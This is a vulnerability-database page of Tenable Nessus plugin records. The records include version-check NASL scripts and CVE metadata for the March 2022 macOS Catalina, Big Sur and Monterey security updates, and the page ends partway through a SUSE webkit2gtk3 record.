DATABASE RESOURCES PRICING ABOUT US

{"id": "MACOS_HT213185.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "macOS 10.15.x < Catalina Security Update 2022-003 Catalina (HT213185)", "description": "The remote host is running a version of macOS / Mac OS X that is prior to Catalina Security Update 2022-003 Catalina. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to gain elevated privileges (CVE-2022-22617, CVE-2022-22631)\n\n - An application may be able to read restricted memory (CVE-2022-22648)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory (CVE-2022-22625, CVE-2022-22626, CVE-2022-22627)\n\n - Processing a maliciously crafted file may lead to arbitrary code execution (CVE-2022-22597)\n\n - A maliciously crafted ZIP archive may bypass Gatekeeper checks (CVE-2022-22616)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2022-22613, CVE-2022-22614, CVE-2022-22615, CVE-2022-22661)\n\n - An attacker in a privileged position may be able to perform a denial of service attack (CVE-2022-22638)\n\n - A person with access to a Mac may be able to bypass Login Window (CVE-2022-22647)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching screen (CVE-2022-22656)\n\n - A plug-in may be able to inherit the application's permissions and access user data (CVE-2022-22650)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - A local user may be able to write arbitrary files (CVE-2022-22582)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "published": "2022-03-16T00:00:00", "modified": "2023-03-23T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/158976", "reporter": "This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22662", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22638", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22617", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22627", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22613", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22625", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22648", "https://support.apple.com/en-us/HT213185", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22661", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22631", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22582", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22615", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22626", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22647", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22616", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22614", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22656", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22597"], "cvelist": ["CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662"], "immutableFields": [], "lastseen": "2023-05-18T14:43:09", "viewCount": 61, "enchantments": {"backreferences": {"references": [{"type": "nessus", "idList": ["APPLE_IOS_154_CHECK.NBIN"]}]}, "dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2022:7704", "ALSA-2022:8054"]}, {"type": "apple", "idList": ["APPLE:8BB162E4A512616135B4203D7F1AA9CD", "APPLE:A07531C05C19836B4B65E06C7D7BB300", "APPLE:ABB9418710E096AFBBD70F254214F920", "APPLE:B1225C474BECEE3D119CD5BC562422D7", "APPLE:C3C11978B39895CE213B101070C72A90", "APPLE:C9EF751487C406A634B9CBD013ECD410", "APPLE:E82A2A3D978FD519CBF58A36F587B070", "APPLE:EDE954643057FF821E196BB6445A667D"]}, {"type": "cve", "idList": ["CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-22662"]}, {"type": "fedora", "idList": ["FEDORA:40905316CFAE", "FEDORA:BCA0E304C251"]}, {"type": "gentoo", "idList": ["GLSA-202208-39"]}, {"type": "mageia", "idList": ["MGASA-2022-0254"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-"]}, {"type": "mmpc", "idList": ["MMPC:447DB6FB8D54C72486ECF54472FDAD42"]}, {"type": "mssecure", "idList": ["MSSECURE:447DB6FB8D54C72486ECF54472FDAD42"]}, {"type": "nessus", "idList": ["ALMA_LINUX_ALSA-2022-8054.NASL", "CENTOS8_RHSA-2022-7704.NASL", "GENTOO_GLSA-202208-39.NASL", "ITUNES_12_12_3.NASL", "ITUNES_12_12_3_BANNER.NASL", "MACOS_HT213183.NASL", "MACOS_HT213184.NASL", "ORACLELINUX_ELSA-2022-7704.NASL", "ORACLELINUX_ELSA-2022-8054.NASL", "REDHAT-RHSA-2022-7704.NASL", "REDHAT-RHSA-2022-8054.NASL", "ROCKY_LINUX_RLSA-2022-7704.NASL", "SUSE_SU-2022-2522-1.NASL", "SUSE_SU-2022-2523-1.NASL", "SUSE_SU-2022-2524-1.NASL", "SUSE_SU-2022-2525-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-7704", "ELSA-2022-8054"]}, {"type": "osv", "idList": ["OSV:DSA-5115-1", "OSV:DSA-5116-1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339"]}, {"type": "redhat", "idList": ["RHSA-2022:7435", "RHSA-2022:7704", "RHSA-2022:8054", "RHSA-2022:8750", "RHSA-2022:8781", "RHSA-2022:8889", "RHSA-2022:8938", "RHSA-2022:8964", "RHSA-2022:9040", "RHSA-2022:9047", "RHSA-2023:0408", "RHSA-2023:0470", "RHSA-2023:0542", "RHSA-2023:0584", "RHSA-2023:0631", "RHSA-2023:0709", "RHSA-2023:0795", "RHSA-2023:0918", "RHSA-2023:0934", "RHSA-2023:1174"]}, {"type": "redhatcve", "idList": ["RH:CVE-2022-22662"]}, {"type": "rocky", "idList": ["RLSA-2022:7704", "RLSA-2022:8054"]}, {"type": "suse", "idList": ["SUSE-SU-2022:2523-1", "SUSE-SU-2022:2525-1"]}, {"type": "thn", "idList": ["THN:D49EB15A8EC646123A52948B0E3A1F24"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-22662"]}, {"type": "veracode", "idList": ["VERACODE:38694"]}, {"type": "zdi", "idList": ["ZDI-22-711", "ZDI-22-712", "ZDI-22-713", "ZDI-22-714", "ZDI-22-715", "ZDI-22-757"]}]}, "score": {"value": 8.9, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-22582", "epss": 0.00042, "percentile": 0.05656, "modified": "2023-05-02"}, {"cve": "CVE-2022-22597", "epss": 0.00068, "percentile": 0.27844, "modified": "2023-05-02"}, {"cve": "CVE-2022-22613", "epss": 0.00065, "percentile": 0.26728, "modified": "2023-05-02"}, {"cve": "CVE-2022-22614", "epss": 0.00065, "percentile": 0.26728, "modified": "2023-05-02"}, {"cve": "CVE-2022-22615", "epss": 0.00065, "percentile": 0.26728, "modified": "2023-05-02"}, {"cve": "CVE-2022-22616", "epss": 0.00048, "percentile": 0.1455, "modified": "2023-05-02"}, {"cve": "CVE-2022-22617", "epss": 0.00042, "percentile": 0.05656, "modified": "2023-05-02"}, {"cve": "CVE-2022-22625", "epss": 0.0006, "percentile": 0.23235, "modified": "2023-05-02"}, {"cve": "CVE-2022-22626", "epss": 0.0006, "percentile": 0.23235, "modified": "2023-05-02"}, {"cve": "CVE-2022-22627", "epss": 0.0006, "percentile": 0.23235, "modified": "2023-05-02"}, {"cve": "CVE-2022-22631", "epss": 0.00042, "percentile": 0.05656, "modified": "2023-05-02"}, {"cve": "CVE-2022-22638", "epss": 0.00183, "percentile": 0.54088, "modified": "2023-05-02"}, {"cve": "CVE-2022-22647", "epss": 0.00058, "percentile": 0.22538, "modified": "2023-05-02"}, {"cve": "CVE-2022-22648", "epss": 0.00062, "percentile": 0.24257, "modified": "2023-05-02"}, {"cve": "CVE-2022-22650", "epss": 0.00045, "percentile": 0.12278, "modified": "2023-05-02"}, {"cve": "CVE-2022-22656", "epss": 0.00042, "percentile": 0.05656, "modified": "2023-05-02"}, {"cve": "CVE-2022-22661", "epss": 0.00063, "percentile": 0.25391, "modified": "2023-05-02"}, {"cve": "CVE-2022-22662", "epss": 0.00075, "percentile": 0.30705, "modified": "2023-05-02"}], "vulnersScore": 8.9}, "_state": {"dependencies": 1684458132, "score": 1684460338, "epss": 0}, "_internal": {"score_hash": "442daeb7225a6e675992bee369a144a0"}, "pluginID": "158976", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158976);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22631\",\n \"CVE-2022-22638\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22656\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213185\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-6\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n\n script_name(english:\"macOS 10.15.x < Catalina Security Update 2022-003 Catalina (HT213185)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update or supplemental update that fixes multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is prior to Catalina Security Update 2022-003\nCatalina. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to gain elevated privileges (CVE-2022-22617, CVE-2022-22631)\n\n - An application may be able to read restricted memory (CVE-2022-22648)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or\n disclosure of process memory (CVE-2022-22625, CVE-2022-22626, CVE-2022-22627)\n\n - Processing a maliciously crafted file may lead to arbitrary code execution (CVE-2022-22597)\n\n - A maliciously crafted ZIP archive may bypass Gatekeeper checks (CVE-2022-22616)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2022-22613,\n CVE-2022-22614, CVE-2022-22615, CVE-2022-22661)\n\n - An attacker in a privileged position may be able to perform a denial of service attack (CVE-2022-22638)\n\n - A person with access to a Mac may be able to bypass Login Window (CVE-2022-22647)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching\n screen (CVE-2022-22656)\n\n - A plug-in may be able to inherit the application's permissions and access user data (CVE-2022-22650)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - A local user may be able to write arbitrary files (CVE-2022-22582)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213185\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.x Catalina Security Update 2022-003 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n {\n 'min_version': '10.15',\n 'max_version': '10.15.7',\n 'fixed_build' : '19H1824',\n 'fixed_display': 'Catalina 10.15.7 Security Update 2022-003'\n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "naslFamily": "MacOS X Local Security Checks", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "solution": "Upgrade to macOS 10.15.x Catalina Security Update 2022-003 or later", "nessusSeverity": "High", "cvssScoreSource": "CVE-2022-22661", "vendor_cvss2": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2022-03-14T00:00:00", "vulnerabilityPublicationDate": "2022-03-14T00:00:00", "exploitableWith": ["Metasploit(macOS Gatekeeper check bypass)"]}

{"nessus": [{"lastseen": "2023-05-18T14:42:36", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.6.5 Big Sur. It is, therefore, affected by multiple vulnerabilities including the following:\n\n - Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. (CVE-2022-22633)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. (CVE-2022-22626, CVE-2022-22627)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching screen. (CVE-2022-22579)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.6.5 Multiple Vulnerabilities (HT213184)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22579", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662"], "modified": "2022-11-08T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213184.NASL", "href": "https://www.tenable.com/plugins/nessus/159105", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159105);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/08\");\n\n script_cve_id(\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22599\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22631\",\n \"CVE-2022-22632\",\n \"CVE-2022-22633\",\n \"CVE-2022-22638\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22656\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213184\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-5\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n\n script_name(english:\"macOS 11.x < 11.6.5 Multiple Vulnerabilities (HT213184)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.6.5 Big Sur. It is, therefore,\naffected by multiple vulnerabilities including the following:\n\n - Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code\n execution. (CVE-2022-22633)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or\n disclosure of process memory. (CVE-2022-22626, CVE-2022-22627)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching\n screen. (CVE-2022-22579)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213184\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22661\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22632\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [{ 'min_version' : '11.0', 'fixed_version' : '11.6.5', 'fixed_display' : 'macOS Big Sur 11.6.5' }];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-30T14:14:39", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.3 Monterey. It is, therefore, affected by multiple vulnerabilities, including the following:\n - A use after free issue was addressed with improved memory management. Successful exploitation could result in arbitrary code execution with kernel privileges (CVE-2022-22614). \n\n - A logic issue was addressed with improved state management. Successful exploitation could result in privilege escalation (CVE-2022-22632).\n\n - A null pointer dereference was addressed with improved validation. Successful exploitation could result in a denial of service condition. (CVE-2022-22638).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.3 (HT213183)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22945", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-36976", "CVE-2021-4136", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-46059", "CVE-2022-0128", "CVE-2022-0156", "CVE-2022-0158", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22621", "CVE-2022-22623", "CVE-2022-22624", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22639", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22643", "CVE-2022-22644", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22656", "CVE-2022-22657", "CVE-2022-22660", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22664", "CVE-2022-22665", "CVE-2022-22668", "CVE-2022-22669"], "modified": "2022-12-15T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213183.NASL", "href": "https://www.tenable.com/plugins/nessus/159106", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159106);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/15\");\n\n script_cve_id(\n \"CVE-2021-4136\",\n \"CVE-2021-4166\",\n \"CVE-2021-4173\",\n \"CVE-2021-4187\",\n \"CVE-2021-4192\",\n \"CVE-2021-4193\",\n \"CVE-2021-22945\",\n \"CVE-2021-22946\",\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2021-46059\",\n \"CVE-2022-0128\",\n \"CVE-2022-0156\",\n \"CVE-2022-0158\",\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22599\",\n \"CVE-2022-22600\",\n \"CVE-2022-22609\",\n \"CVE-2022-22610\",\n \"CVE-2022-22611\",\n \"CVE-2022-22612\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22621\",\n \"CVE-2022-22623\",\n \"CVE-2022-22624\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22631\",\n \"CVE-2022-22632\",\n \"CVE-2022-22633\",\n \"CVE-2022-22637\",\n \"CVE-2022-22638\",\n \"CVE-2022-22639\",\n \"CVE-2022-22640\",\n \"CVE-2022-22641\",\n \"CVE-2022-22643\",\n \"CVE-2022-22644\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22651\",\n \"CVE-2022-22656\",\n \"CVE-2022-22657\",\n \"CVE-2022-22660\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\",\n \"CVE-2022-22664\",\n \"CVE-2022-22665\",\n \"CVE-2022-22668\",\n \"CVE-2022-22669\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213183\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-4\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0442-S\");\n\n script_name(english:\"macOS 12.x < 12.3 (HT213183)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.3 Monterey. It is, therefore,\naffected by multiple vulnerabilities, including the following:\n \n - A use after free issue was addressed with improved memory management. Successful exploitation could \n result in arbitrary code execution with kernel privileges (CVE-2022-22614). \n\n - A logic issue was addressed with improved state management. Successful exploitation could result in\n privilege escalation (CVE-2022-22632).\n\n - A null pointer dereference was addressed with improved validation. Successful exploitation could \n result in a denial of service condition. (CVE-2022-22638).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-gb/HT213183\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22665\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [\n {\n 'min_version': '12.0', \n 'fixed_version': '12.3', \n 'fixed_display': 'macOS Monterey 12.3'\n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T08:43:22", "description": "The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:2522-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-23T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : webkit2gtk3 